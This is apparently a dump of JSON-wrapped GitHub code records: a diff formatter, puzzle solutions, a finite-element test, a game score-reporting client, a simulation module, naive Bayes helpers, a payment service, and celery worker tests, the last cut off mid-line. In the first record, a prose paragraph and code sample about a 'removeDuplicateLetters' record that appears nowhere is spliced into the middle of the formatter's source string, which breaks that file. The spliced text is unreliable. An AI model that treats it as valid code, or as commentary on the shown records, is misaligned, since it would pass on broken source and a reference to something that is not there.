gendiff.compare_data.comparison_tree import SPLIT, CHANGED\r\nfrom gendiff.compare_data.comparison_tree import STATUS, VALUE\r\nfrom gendiff.compare_data.comparison_tree import VALUE_INITIAL\r\nfrom gendiff.compare_data.comparison_tree import VALUE_MODIFIED\r\n\r\nfrom gendiff.formating.suplementary import convert_non_string as converter\r\n\r\n\r\nRENAME_DICT = {ADD: \"Property '{0}' was added with value: {1}\",\r\n DEL: \"Property '{0}' was removed\"}\r\nUPDATED = \"Property '{0}' was updated. 
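
The `removeDuplicateLetters` record above is the standard greedy monotonic-stack solution: pop any stacked letter that is lexicographically larger than the current one and still occurs later. The same algorithm rewritten with dictionaries instead of 26-element arrays, as a quick sanity check:

```python
def remove_duplicate_letters(s):
    remaining = {}
    for c in s:
        remaining[c] = remaining.get(c, 0) + 1

    stack, on_stack = [], set()
    for c in s:
        remaining[c] -= 1
        if c in on_stack:
            continue
        # pop letters larger than c that still occur later in s
        while stack and c < stack[-1] and remaining[stack[-1]] > 0:
            on_stack.discard(stack.pop())
        stack.append(c)
        on_stack.add(c)
    return ''.join(stack)

print(remove_duplicate_letters("cbacdcbc"))  # acdb
```
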
From {1} to {2}\"\r\n\r\n\r\ndef convert_value(argument):\r\n complex_formats = [list, dict, set, tuple]\r\n if isinstance(argument, str):\r\n return f\"'{argument}'\"\r\n if type(argument) in complex_formats:\r\n return \"[complex value]\"\r\n return str(converter(argument))\r\n\r\n\r\ndef walker(data, pedigree=[]):\r\n line = []\r\n for name, match in data.items():\r\n status = match[STATUS]\r\n if status == KEPT:\r\n continue\r\n parent = pedigree + [name]\r\n full_name = \".\".join(parent)\r\n if status == SPLIT:\r\n line += chain(walker(match[VALUE], parent))\r\n elif status == CHANGED:\r\n deleted = convert_value(match[VALUE_INITIAL])\r\n changed = convert_value(match[VALUE_MODIFIED])\r\n line.append(UPDATED.format(full_name, deleted, changed))\r\n else:\r\n changed = convert_value(match[VALUE])\r\n line.append(RENAME_DICT[status].format(full_name, changed))\r\n return line\r\n\r\n\r\ndef generate_plain(data):\r\n lines = walker(data)\r\n return '\\n'.join(lines)\r\n","repo_name":"VVtatarinoff/python-project-lvl2","sub_path":"gendiff/formating/plain.py","file_name":"plain.py","file_ext":"py","file_size_in_byte":1667,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"2591366526","text":"# Reading in Data as .txt file\nwith open('Day04.txt', 'r') as inputFile:\n p_input = inputFile.read()\n\n\ndef ParseInput(puzzle):\n newPuzzle = []\n newPuzzle_Segment = []\n newPuzzle_Line = ''\n for p in range(len(puzzle)):\n if puzzle[p] != '\\n':\n newPuzzle_Line = newPuzzle_Line + puzzle[p]\n if p == len(puzzle) - 1:\n newPuzzle_Segment.append(newPuzzle_Line.split(','))\n elif puzzle[p] == '\\n':\n newPuzzle_Segment.append(newPuzzle_Line.split(','))\n newPuzzle_Line = ''\n # Fill out the sections\n for segment in newPuzzle_Segment:\n Section_List = []\n for s in segment:\n Section = s.split('-')\n Section = list(range(int(Section[0]), int(Section[-1]) + 1, 1))\n Section_List.append(Section)\n newPuzzle.append(Section_List)\n return newPuzzle\n\n\ndef FindContainedSections(Section):\n Section_Intersection = (list(set(Section[0]).intersection(set(Section[1]))))\n Section_Intersection.sort()\n # Part One\n # if Section_Intersection == Section[0] or Section_Intersection == Section[1]:\n # return True\n # else:\n # return False\n #\n # Part Two\n if len(Section_Intersection) > 0:\n return True\n else:\n return False\n\n\nprint(p_input)\np_input = ParseInput(p_input)\n\nTally = 0\nfor p in p_input:\n Contained = FindContainedSections(p)\n if Contained is True:\n Tally += 1\n elif Contained is False:\n pass\nprint(Tally)\n","repo_name":"jmoore-94/AOC_2022","sub_path":"AdventOfCode2022_04.py","file_name":"AdventOfCode2022_04.py","file_ext":"py","file_size_in_byte":1515,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"25822833125","text":"# -*- coding: utf-8 -*-\n'''Test extrapolation from Gauss points. Home made test.'''\n\nfrom __future__ import division\nfrom __future__ import print_function\n\n__author__= \"Luis C. 
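
The plain formatter above walks the comparison tree, joins nested keys with dots, and renders one sentence per change from three templates. Filling the templates by hand shows the intended output shape (the property names below are made up, and plain string keys stand in for the record's ADD/DEL constants):

```python
RENAME_DICT = {"added": "Property '{0}' was added with value: {1}",
               "removed": "Property '{0}' was removed"}
UPDATED = "Property '{0}' was updated. From {1} to {2}"

print(RENAME_DICT["added"].format("common.setting4", "'blah blah'"))
print(RENAME_DICT["removed"].format("common.setting2"))
print(UPDATED.format("group1.baz", "'bas'", "'bars'"))
```
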
Pérez Tato (LCPT) and Ana Ortega (AOO)\"\n__copyright__= \"Copyright 2020, LCPT and AOO\"\n__license__= \"GPL\"\n__version__= \"3.0\"\n__email__= \"l.pereztato@gmail.com\"\n\nimport xc\nfrom solution import predefined_solutions\nfrom model import predefined_spaces\nfrom materials import typical_materials\n# from postprocess import output_handler\n\n# Problem type\nfeProblem= xc.FEProblem()\npreprocessor= feProblem.getPreprocessor\n# Materials definition\nelast2d= typical_materials.defElasticIsotropicPlaneStress(preprocessor, \"elast2d\",E= 1e9,nu= 0.3, rho= 0.0)\n\nnodes= preprocessor.getNodeHandler \nmodelSpace= predefined_spaces.SolidMechanics2D(nodes)\nnod0= nodes.newNodeXY(0,0)\nnod1= nodes.newNodeXY(0.5,0)\nnod2= nodes.newNodeXY(1,0)\nnod3= nodes.newNodeXY(0,0.5)\nnod4= nodes.newNodeXY(0.5,0.5)\nnod5= nodes.newNodeXY(1,0.5)\nnod6= nodes.newNodeXY(0,1)\nnod7= nodes.newNodeXY(0.5,1)\nnod8= nodes.newNodeXY(1,1)\n\nelements= preprocessor.getElementHandler\nelements.defaultMaterial= elast2d.name\n\n\nquad0= elements.newElement('FourNodeQuad',xc.ID([nod0.tag, nod1.tag, nod4.tag, nod3.tag]))\nquad1= elements.newElement('FourNodeQuad',xc.ID([nod1.tag, nod2.tag, nod5.tag, nod4.tag]))\nquad2= elements.newElement('FourNodeQuad',xc.ID([nod3.tag, nod4.tag, nod7.tag, nod6.tag]))\nquad3= elements.newElement('FourNodeQuad',xc.ID([nod4.tag, nod5.tag, nod8.tag, nod7.tag]))\nquads= [quad0, quad1, quad2, quad3]\n\n# totalSet= preprocessor.getSets.getSet('total')\n# for e in totalSet.getElements:\n# print(e.tag, 'K= ', e.getTangentStiff().Norm())\nnod0.fix(xc.ID([0,1]),xc.Vector([0,0]) )\nnod1.fix(xc.ID([1]),xc.Vector([0]) )\nnod2.fix(xc.ID([1]),xc.Vector([0]) )\n\n# Load definition\nP= 10e3*2/3 # punctual load.\n## Load case definition.\nlp0= modelSpace.newLoadPattern(name= '0')\nmodelSpace.setCurrentLoadPattern(lp0.name)\nnod2.newLoad(xc.Vector([P,0]))\nnod3.newLoad(xc.Vector([-P,0]))\nnod5.newLoad(xc.Vector([P,0]))\nnod6.newLoad(xc.Vector([-P,P]))\nnod7.newLoad(xc.Vector([0,P]))\nnod8.newLoad(xc.Vector([P,P]))\n## We add the load case to domain.\nmodelSpace.addLoadCaseToDomain(lp0.name)\n\n# Graphic stuff. 
Uncomment to get graphics working.\n#oh= output_handler.OutputHandler(modelSpace)\n\n# Uncomment to display the mesh\n# oh.displayFEMesh()\n\n# Solution\nanalysis= predefined_solutions.simple_static_linear(feProblem)\nresult= analysis.analyze(1)\n\n\nsXnodes= list()\nsYnodes= list()\nsX= 0.0\nsY= 0.0\nsXY= 0.0\ncount= 0.0\nfor q in quads: \n elementStresses= q.physicalProperties.getVectorMaterials.getValues('stress', False)\n nodeStresses= q.getExtrapolatedValues(elementStresses)\n #vMises= q.physicalProperties.getVectorMaterials.getValues('von_mises_stress', False)\n # print('element stresses: ', elementStresses)\n # print('node stresses: ', nodeStresses)\n\n sz= nodeStresses.noRows\n for i in range(0,sz):\n sX+= nodeStresses(i,0)\n sY+= nodeStresses(i,1)\n sXY+= nodeStresses(i,2)/2.0\n sYnodes.append(sY)\n sXnodes.append(sX)\n count+= 1\n\nsX/= count\nsY/= count\nsXY/= count\nsXerr= (sX-3*P)/3/P\nsYerr= (sY-3*P)/3/P\ntauErr= sXY\n\n# oh.displayLoads()\n# oh.displayDispRot('uY')\n# oh.displayStresses('sigma_11')\n# oh.displayVonMisesStresses()\n# oh.displayStresses('sigma_22')\n# oh.displayStresses('sigma_12')\n# oh.displayStrains('epsilon_xx')\n# oh.displayStrains('epsilon_yy')\n\n'''\nprint('sigma_11 on nodes: ', sXnodes)\nprint('sigma_22 on nodes: ', sYnodes)\nprint('sigma_11: ', sX)\nprint('sigma_22: ', sY)\nprint('sigma_12: ', sXY)\nprint('error in sigma_11: ', sXerr)\nprint('error in sigma_22: ', sYerr)\nprint('error in sigma_12: ', tauErr)\n'''\n\nimport os\nfrom misc_utils import log_messages as lmsg\nfname= os.path.basename(__file__)\nif(sXerr<1e-10 and sYerr<1e-10 and tauErr<1e-10):\n print('test '+fname+': ok.')\nelse:\n lmsg.error(fname+' ERROR.')\n","repo_name":"xcfem/xc","sub_path":"verif/tests/elements/plane/test_extrapolate_values_quad_02.py","file_name":"test_extrapolate_values_quad_02.py","file_ext":"py","file_size_in_byte":3937,"program_lang":"python","lang":"en","doc_type":"code","stars":196,"dataset":"github-code","pt":"31"} +{"seq_id":"19852348618","text":"# coding: utf-8\n# Created on 2013-8-28\n# Author: Panjiang\n\nimport json\nimport urllib\nfrom sdk.util.http import HttpRequest\n\n\nclass ReportApi(object):\n \"\"\"\n Interface for reporting data\n \"\"\"\n\n def __init__(self, appid, qq_rank_host, wx_rank_host, log=None):\n self.appid = appid\n self.qq_rank_host = qq_rank_host\n self.wx_rank_host = wx_rank_host\n self.http = HttpRequest(log)\n\n def update_qq_score(self, zone_id, nickname, openid, score=None, top_score=None):\n \"\"\"\n Update a QQ user's game score\n\n Example:\n http://10.153.96.115:10000/game/rp_achieves?appid=xxx&access_token=xxx&openid=xxx&uin=xxx&param={}\n \"\"\"\n if score:\n score = int(score)\n if top_score:\n top_score = int(top_score)\n ls = []\n\n item_zone = {'type':1001, 'data':str(zone_id), 'expires':0, 'bcover':1}\n ls.append(item_zone)\n\n url_nickname = urllib.quote(nickname.encode('utf8'))\n item_nickname = {'type':1002, 'data': url_nickname, 'expires':0, 'bcover':1}\n ls.append(item_nickname)\n\n\n if score:\n item_score = {'type':3, 'data':str(score), 'expires':0, 'bcover':0}\n ls.append(item_score)\n\n if top_score:\n max_score = {'type':5, 'data':str(top_score), 'expires':0, 'bcover':1}\n ls.append(max_score)\n\n data = json.dumps({\"zone\":2, \"total\":10, \"list\":ls})\n uri = '/v2/game/rp_achieves?appid=%s&openid=%s&param=%s' % (self.appid, openid, data)\n\n # host = (\"192.168.10.241\", 8080)\n # uri = '/test.php?appid=%s&openid=%s&param=%s' % (product.appid, user.openid, data)\n self.http.request(self.qq_rank_host, uri)\n\n def update_wx_score(self, wx_access_token, 
openid, score):\n \"\"\"\n Update a WeChat user's game score\n \"\"\"\n uri = '/game/score?access_token=%s' % wx_access_token\n data = json.dumps({\"openid\":openid, \"score\":score, \"expires\":0})\n self.http.request(self.wx_rank_host, uri, data, json_type=True)\n \n","repo_name":"isphinx/traversing","sub_path":"sdk/api/tencent/report_api.py","file_name":"report_api.py","file_ext":"py","file_size_in_byte":2050,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"9053975863","text":"import dataclasses as dclass\n\nimport source.hint as hint\nimport source.keyword as keyword\n\n\n@dclass.dataclass\nclass Target(object):\n \"\"\"\n Class to handle target consumption\n\n Variables:\n loss: mathematical function for if we lose/keep the target\n\n Methods:\n consume: run the behavior\n\n Constructors:\n setup: setup class\n \"\"\"\n\n loss: hint.loss = None\n\n @property\n def _use_loss(self) -> bool:\n \"\"\"Determine if we use the loss model\"\"\"\n\n return self.loss is not None\n\n def _keep_target(self, larva: hint.larva,\n target: hint.target) -> bool:\n \"\"\"\n Determine if we lose the target\n\n Args:\n larva: the larva in question\n target: the larva's target\n\n Returns:\n if the larva moves away from the target\n \"\"\"\n\n if self._use_loss:\n return self.loss(larva.mass, target.mass,\n larva.genotype, target.agent_key)\n else:\n return False\n\n @staticmethod\n def _consume_target(larva: hint.larva,\n target: hint.target) -> None:\n \"\"\"\n Consume the target\n\n Args:\n larva: the larva in question\n target: the larva's target\n\n Effects:\n run consume behavior on target\n \"\"\"\n\n if target.agent_key == keyword.egg_mass:\n larva.consume_egg(target)\n else:\n larva.consume_larva(target)\n\n def consume(self, larva: hint.larva) -> None:\n \"\"\"\n Run a target consume behavior on the larva's target\n\n Args:\n larva: the larva in question\n\n Effects:\n run target consumption\n \"\"\"\n\n target = larva.target\n\n if self._keep_target(larva, target):\n self._consume_target(larva, target)\n else:\n larva.target = None\n\n @classmethod\n def setup(cls, **kwargs) -> 'Target':\n \"\"\"\n Setup the class\n\n Args:\n **kwargs: simulation input models\n\n Returns:\n setup class\n \"\"\"\n\n if keyword.loss in kwargs:\n return cls(kwargs[keyword.loss])\n else:\n return cls()\n","repo_name":"WilliamJamieson/FallArmyworm_Thesis","sub_path":"source/forage/target.py","file_name":"target.py","file_ext":"py","file_size_in_byte":2263,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"19860289419","text":"import sys\nsys.stdin = open(\"daily/230405/2468.txt\")\nfrom collections import deque\ndef bfs(i,j,k):\n global cnt\n cnt += 1\n q = deque([])\n v[i][j] = 1\n q.append((i,j))\n while q:\n ci,cj = q.popleft()\n for di, dj in ((0, 1), (0, -1), (1, 0), (-1, 0)):\n ni, nj = ci+di, cj+dj\n if 0<=ni<num and 0<=nj<num and arr[ni][nj] > k and v[ni][nj] == 0:\n q.append((ni, nj))\n v[ni][nj] = 1\n\nnum = int(input())\nans = 0\narr = [list(map(int, input().split())) for _ in range(num)]\nmax_v = max(map(max, arr))\nfor k in range(max_v+1):\n cnt = 0\n v = [[0] * num for _ in range(num)]\n for i in range(num):\n for j in range(num):\n if arr[i][j] >k and v[i][j] == 0:\n bfs(i,j,k)\n if cnt>ans:\n 
ans=cnt\nprint(ans)","repo_name":"dong-3-hoon/Algo","sub_path":"daily/2304/230405/baek_2468_saftyarea.py","file_name":"baek_2468_saftyarea.py","file_ext":"py","file_size_in_byte":819,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"74244179608","text":"# imported packages\nfrom model import *\nfrom numpy import log, inf\nimport os\n\n\n# this method gets the testing data\ndef get_testing_title(data, year='2019'):\n testing_year = []\n testing_titles = []\n # get raw testing title from data + convert to lowercase\n for d in data:\n if d['year'] == year:\n testing_year.append(([d.get('Title').lower()], d.get('Post Type')))\n testing_titles.append(d.get('Title').lower())\n return testing_year, testing_titles\n\n\n# this method cleans the tokenized data\ndef clean_testing_data(raw_data):\n # tokenize by removing white lines\n tokens = tokenize_data(raw_data)\n # remove punctuation from tokens\n no_punctuation_tokens, _ = remove_punctuation(tokens)\n # remove non alphabetic tokens\n alpha_tokens = [word for word in no_punctuation_tokens if word.isalpha()]\n return alpha_tokens\n\n\n# this method smooths (0.5) words not in the vocabulary\ndef get_unknown_smooth_prob(class_words_count, vocab_size):\n # prob = round(0.5 / (class_words_count + (0.5 * vocab_size)), 6)\n prob = 0.5 / (class_words_count + (0.5 * vocab_size))\n return prob\n\n\n# this method computes the score for each title\ndef get_score(test_titles, p_class, class_word_pob, class_words_count, vocab_size, class_type):\n # handle divide by zero runtime warning\n # score(class) = log(p(class)) + log(p(first word | class)) + ... + log(p(last word | class))\n class_score_list = []\n for title in test_titles:\n class_score = log(p_class) if p_class > 0 else -inf\n for i in range(len(title)):\n if class_word_pob.get(title[i]):\n class_score += log(class_word_pob.get(title[i]))\n else:\n class_score += log(get_unknown_smooth_prob(class_words_count, vocab_size))\n class_score_list.append(class_score)\n # print(class_type, 'score:', class_score_list)\n return class_score_list\n\n\n# this method returns the max class score\ndef get_max_score(story, ask, show, poll):\n return max([story, ask, show, poll])\n\n\n# this method computes max score\ndef compute_max_scores(test_score_df):\n max_scores = []\n for i in range(len(test_score_df)):\n # score for each class\n story_score = test_score_df.get('story')[i]\n ask_score = test_score_df.get('ask_hn')[i]\n show_score = test_score_df.get('show_hn')[i]\n poll_score = test_score_df.get('poll')[i]\n # store max score in list\n max_scores.append(get_max_score(story_score, ask_score, show_score, poll_score))\n test_score_df['max_score'] = max_scores # add max_score column to df\n return max_scores\n\n\n# this method sets the classified label\ndef set_classify_label(test_score_df, max_scores):\n classify_label = []\n for i in range(len(test_score_df)):\n if max_scores[i] == test_score_df.get('story')[i]:\n classify_label.append('story')\n elif max_scores[i] == test_score_df.get('ask_hn')[i]:\n classify_label.append('ask_hn')\n elif max_scores[i] == test_score_df.get('show_hn')[i]:\n classify_label.append('show_hn')\n else:\n classify_label.append('poll')\n test_score_df['classify_label'] = classify_label # add classify_label column to df\n return classify_label\n\n\n# this method checks if the classification is right or wrong\ndef check_classification(test_score_df):\n classify_result = []\n for i in range(len(test_score_df)):\n # compare actual label and 
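
The flood-fill record above re-runs a fresh BFS pass for every water level k, which is O(max_height · N²) and fine for the problem's small grids. The per-level counting, packaged as a function with a hardcoded sample grid (the grid values are illustrative, not the judge's input):

```python
from collections import deque

def safe_areas(grid, k):
    """Count 4-connected regions whose height is strictly greater than k."""
    n = len(grid)
    seen = [[False] * n for _ in range(n)]
    regions = 0
    for si in range(n):
        for sj in range(n):
            if grid[si][sj] > k and not seen[si][sj]:
                regions += 1
                seen[si][sj] = True
                q = deque([(si, sj)])
                while q:
                    ci, cj = q.popleft()
                    for di, dj in ((0, 1), (0, -1), (1, 0), (-1, 0)):
                        ni, nj = ci + di, cj + dj
                        if 0 <= ni < n and 0 <= nj < n and grid[ni][nj] > k and not seen[ni][nj]:
                            seen[ni][nj] = True
                            q.append((ni, nj))
    return regions

grid = [[6, 8, 2], [3, 2, 3], [6, 2, 5]]
print(max(safe_areas(grid, k) for k in range(max(map(max, grid)) + 1)))  # 3
```
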
classified label\n classify_result.append('right') \\\n if test_score_df.get('actual_label')[i] == test_score_df.get('classify_label')[i] \\\n else classify_result.append('wrong')\n test_score_df['classify_result'] = classify_result # add classify_result column to df\n return classify_result\n\n\n# this method computes the number of right and wrong\ndef get_number_right_wrong(testing_score_df):\n right_count = wrong_count = 0\n for r in testing_score_df['classify_result'].values:\n if r == 'right':\n right_count += 1\n else:\n wrong_count += 1\n print('right: ', right_count, 'wrong: ', wrong_count)\n return right_count, wrong_count\n\n\n# this method creates baseline-result.txt file\ndef create_baseline(baseline_file, test_score_df, test_titles, classify_label,\n story_scores, ask_scores, show_scores, poll_scores,\n actual_labels, classify_result):\n os.makedirs(os.path.dirname('./output/'), exist_ok=True) # create output directory if it doesn't exist\n baseline_file_path = './output/'+baseline_file\n with open(baseline_file_path, 'w') as f:\n for i in range(len(test_score_df)):\n baseline = (str(i + 1) + ' ' + test_titles[i] + ' ' + classify_label[i]\n + ' ' + str(story_scores[i]) + ' ' + str(ask_scores[i])\n + ' ' + str(show_scores[i]) + ' ' + str(poll_scores[i])\n + ' ' + str(actual_labels[i]) + ' ' + str(classify_result[i]) + \"\\r\")\n f.write(baseline)\n f.close()\n print('Done writing to', baseline_file)\n","repo_name":"lekside1/AI-Naive-Bayes","sub_path":"naiveBayes.py","file_name":"naiveBayes.py","file_ext":"py","file_size_in_byte":5118,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"34468818702","text":"#create a main function that runs when this file is executed\ndef main():\n print('Hello')\n print('This program will present a variety of converters')\n print('for you to use.')\n print('--------------------------------------------')\n menu()\n\ndef menu():\n choice = '0'\n while choice == '0':\n print(\"1: Fahrenheit to Celsius\")\n print(\"2: Miles to Kilometers\")\n print(\"3: To quit\")\n choice = input(\"Please make a choice: \")\n if choice == \"3\":\n print(\"Quitting.. 
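
The scorer above works in log space so that products of small word probabilities don't underflow, and it substitutes a 0.5-smoothed probability for out-of-vocabulary words. A worked miniature with toy numbers (the probabilities below are invented for illustration):

```python
from math import log

p_class = 0.6                                # prior for one class
word_prob = {"show": 0.02, "hn": 0.05}       # per-class word probabilities

def unknown_prob(class_words_count=100, vocab_size=50):
    return 0.5 / (class_words_count + 0.5 * vocab_size)

score = log(p_class)
for w in ["show", "hn", "zebra"]:            # 'zebra' is out of vocabulary
    score += log(word_prob.get(w, unknown_prob()))
print(round(score, 2))                       # -12.94
```
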
\")\n break\n elif choice == \"2\":\n #call the m2km function\n print('hi')\n menu()\n elif choice == \"1\":\n val = int(input('Enter a temperature'))\n cel = ftoc(val)\n print('{0} Fahrenheit = {1:.2f} Celsius'.format(val, cel))\n menu()\n else:\n print(\"I don't understand your choice.\")\n menu()\n\n\n\n#create a function to convert fahrenheit to celsius\ndef ftoc(fah):\n cel = (fah-32) * 5/9\n return cel\n\nmain()\n","repo_name":"jparlas/AFPwork","sub_path":"myFunctions.py","file_name":"myFunctions.py","file_ext":"py","file_size_in_byte":1053,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"10874710257","text":"from app import app\nfrom app.libraries.random_string import RandomString\nfrom app.libraries.token_handler import TokenHandler\nfrom app.models.model_payment import ModelPayment\nfrom app.models.model_payment_session import ModelPaymentSession\nfrom datetime import datetime\nimport requests\n\nclass PaymentService(object):\n config = {}\n base_result = {\n 'data': None,\n 'total_data': 0\n }\n PAYMENT_CODE_LENGTH = 11\n PAYMENT_TOKEN_LENGTH = 118\n MOUNTAIN_HOST = app.environment.get('APP_MOUNTAIN_HOST')\n \n def __init__(self, config = None):\n super(PaymentService, self).__init__()\n\n if config:\n self.config = config\n\n def generate_payment_list(self, data_model = None):\n data_sql = getattr(ModelPayment(data_model), 'get_list')()\n\n raw_data = data_sql.get('data')\n\n if raw_data:\n for item_raw_data in raw_data:\n # Get payment session value\n payment_token = item_raw_data.get('payment_token')\n\n content_data_session = getattr(ModelPaymentSession(), 'get_detail_by')('token', payment_token)\n content_data_session = content_data_session.get('data')\n\n item_raw_data['is_expired'] = self.check_payment_expired(content_data_session.get('expired'))\n\n self.base_result['data'] = data_sql.get('data')\n self.base_result['total_data'] = data_sql.get('total_rows')\n\n return self.base_result\n\n def generate_payment_detail(self, columns = None, payment_code = None):\n data_sql = getattr(ModelPayment(), 'get_detail_by')(columns, payment_code)\n\n raw_data = data_sql.get('data')\n\n if raw_data:\n # Get payment session value\n payment_token = raw_data.get('payment_token')\n\n content_data_session = getattr(ModelPaymentSession(), 'get_detail_by')('token', payment_token)\n content_data_session = content_data_session.get('data')\n \n raw_data['is_expired'] = self.check_payment_expired(content_data_session.get('expired'))\n\n self.base_result['data'] = data_sql.get('data')\n self.base_result['total_data'] = data_sql.get('total_rows')\n\n return self.base_result\n\n def create_payment(self, data_model = None):\n # To Do :: Create validation here\n payment_token = self.generate_payment_token()\n data_model['payment_token'] = payment_token\n\n getattr(ModelPaymentSession(), 'create_data')({\n 'token': payment_token\n })\n\n payment_session_id = app.mysql_lastrowid\n\n payment_session_detail = getattr(ModelPaymentSession(), 'get_detail_by')('id', payment_session_id)\n payment_session_created = payment_session_detail['data']['created_at']\n \n payment_expired = TokenHandler({\n 'time_by': 'minute',\n 'time_by_value': 30,\n 'session_time': payment_session_created\n }).create_expired_time()\n\n queries = \"expired='{}'\".format(payment_expired)\n \n data_model_session = {\n 'id': payment_session_id,\n 'data': queries\n }\n\n getattr(ModelPaymentSession(), 'update_data')(data_model_session)\n\n getattr(ModelPayment(), 
'create_data')(data_model)\n\n def update_payment(self, data_model = None):\n # To Do :: Create validation here\n getattr(ModelPayment(), 'update_data')(data_model)\n\n # Get detail payment \n payment_code = data_model.get('code')\n raw_payment_detail = self.generate_payment_detail('code', payment_code.upper())\n data_payment_detail = raw_payment_detail.get('data')\n\n if data_payment_detail:\n # Update booking status in mountain apps\n booking_code = data_payment_detail.get('booking_code')\n transaction_status = data_payment_detail.get('transaction_status')\n\n if booking_code:\n data_update_booking = {\n 'payment_status': transaction_status\n }\n res_update_booking = requests.put('{}/booking/{}'.format(self.MOUNTAIN_HOST, booking_code), json = data_update_booking)\n res_update_booking = res_update_booking.json()\n\n def generate_payment_code(self):\n result = RandomString({\n 'key_length': self.PAYMENT_CODE_LENGTH\n }).run()\n\n result = '{}{}{}'.format('RMNSA', result.upper(), 'PAY')\n\n return result\n\n def generate_payment_token(self):\n result = RandomString({\n 'key_length': self.PAYMENT_TOKEN_LENGTH\n }).run()\n\n return result.upper()\n\n def check_availability_payment_code(self, payment_code = None):\n availability_result = {\n 'status': 0,\n 'message': 'Available',\n 'payment_code': payment_code\n }\n\n # Check availability payment code\n data_sql = getattr(ModelPayment(), 'get_detail_by')('code', payment_code)\n\n if data_sql.get('data'):\n availability_result['status'] = 1\n availability_result['message'] = 'Not Available'\n\n self.base_result['data'] = availability_result\n self.base_result['total_data'] = data_sql.get('total_rows')\n\n return self.base_result\n\n def check_payment_expired(self, expired_time = None):\n return TokenHandler().check_expired_time(expired_time)","repo_name":"muzanella11/rimornesia-billing-backend","sub_path":"app/services/payment_service.py","file_name":"payment_service.py","file_ext":"py","file_size_in_byte":5390,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"15964217246","text":"from __future__ import absolute_import\nfrom __future__ import with_statement\n\nimport logging\nimport os\nimport sys\n\nfrom functools import wraps\n\nfrom mock import Mock, patch\nfrom nose import SkipTest\n\nfrom billiard import current_process\nfrom kombu import Exchange, Queue\n\nfrom celery import Celery\nfrom celery import platforms\nfrom celery import signals\nfrom celery import current_app\nfrom celery.apps import worker as cd\nfrom celery.bin.celeryd import WorkerCommand, main as celeryd_main\nfrom celery.exceptions import ImproperlyConfigured, SystemTerminate\nfrom celery.task import trace\nfrom celery.utils.log import ensure_process_aware_logger\nfrom celery.worker import state\n\nfrom celery.tests.utils import (\n AppCase,\n WhateverIO,\n skip_if_pypy,\n skip_if_jython,\n)\n\nensure_process_aware_logger()\n\n\nclass WorkerAppCase(AppCase):\n\n def tearDown(self):\n super(WorkerAppCase, self).tearDown()\n trace.reset_worker_optimizations()\n\n\ndef disable_stdouts(fun):\n\n @wraps(fun)\n def disable(*args, **kwargs):\n prev_out, prev_err = sys.stdout, sys.stderr\n prev_rout, prev_rerr = sys.__stdout__, sys.__stderr__\n sys.stdout = sys.__stdout__ = WhateverIO()\n sys.stderr = sys.__stderr__ = WhateverIO()\n try:\n return fun(*args, **kwargs)\n finally:\n sys.stdout = prev_out\n sys.stderr = prev_err\n sys.__stdout__ = prev_rout\n sys.__stderr__ = prev_rerr\n\n return disable\n\n\nclass 
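
In the payment-service record above, `generate_payment_code` wraps an 11-character random string in fixed 'RMNSA'/'PAY' markers (availability is checked separately via `check_availability_payment_code`). A standalone equivalent of the code generation, with the stdlib `secrets` module standing in for the record's internal `RandomString` helper:

```python
import secrets
import string

def generate_payment_code(length=11, prefix="RMNSA", suffix="PAY"):
    # draw `length` characters uniformly from uppercase letters and digits
    body = ''.join(secrets.choice(string.ascii_uppercase + string.digits)
                   for _ in range(length))
    return prefix + body + suffix

print(generate_payment_code())  # e.g. RMNSA7K2Q9XB41M0PAY
```
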
_WorkController(object):\n\n def __init__(self, *args, **kwargs):\n pass\n\n def start(self):\n pass\n\n\nclass Worker(cd.Worker):\n WorkController = _WorkController\n\n def __init__(self, *args, **kwargs):\n super(Worker, self).__init__(*args, **kwargs)\n self.redirect_stdouts = False\n\n\nclass test_Worker(WorkerAppCase):\n\n Worker = Worker\n\n def teardown(self):\n self.app.conf.CELERY_INCLUDE = ()\n\n @disable_stdouts\n def test_queues_string(self):\n celery = Celery(set_as_current=False)\n worker = celery.Worker(queues='foo,bar,baz')\n worker.init_queues()\n self.assertEqual(worker.use_queues, ['foo', 'bar', 'baz'])\n self.assertTrue('foo' in celery.amqp.queues)\n\n @disable_stdouts\n def test_cpu_count(self):\n celery = Celery(set_as_current=False)\n with patch('celery.apps.worker.cpu_count') as cpu_count:\n cpu_count.side_effect = NotImplementedError()\n worker = celery.Worker(concurrency=None)\n self.assertEqual(worker.concurrency, 2)\n worker = celery.Worker(concurrency=5)\n self.assertEqual(worker.concurrency, 5)\n\n @disable_stdouts\n def test_windows_B_option(self):\n celery = Celery(set_as_current=False)\n celery.IS_WINDOWS = True\n with self.assertRaises(SystemExit):\n WorkerCommand(app=celery).run(beat=True)\n\n def test_setup_concurrency_very_early(self):\n x = WorkerCommand()\n x.run = Mock()\n with self.assertRaises(ImportError):\n x.execute_from_commandline(['celeryd', '-P', 'xyzybox'])\n\n @disable_stdouts\n def test_invalid_loglevel_gives_error(self):\n x = WorkerCommand(app=Celery(set_as_current=False))\n with self.assertRaises(SystemExit):\n x.run(loglevel='GRIM_REAPER')\n\n def test_no_loglevel(self):\n app = Celery(set_as_current=False)\n app.Worker = Mock()\n WorkerCommand(app=app).run(loglevel=None)\n\n def test_tasklist(self):\n celery = Celery(set_as_current=False)\n worker = celery.Worker()\n self.assertTrue(worker.app.tasks)\n self.assertTrue(worker.app.finalized)\n self.assertTrue(worker.tasklist(include_builtins=True))\n worker.tasklist(include_builtins=False)\n\n def test_extra_info(self):\n celery = Celery(set_as_current=False)\n worker = celery.Worker()\n worker.loglevel = logging.WARNING\n self.assertFalse(worker.extra_info())\n worker.loglevel = logging.INFO\n self.assertTrue(worker.extra_info())\n\n @disable_stdouts\n def test_loglevel_string(self):\n worker = self.Worker(loglevel='INFO')\n self.assertEqual(worker.loglevel, logging.INFO)\n\n def test_run_worker(self):\n handlers = {}\n\n class Signals(platforms.Signals):\n\n def __setitem__(self, sig, handler):\n handlers[sig] = 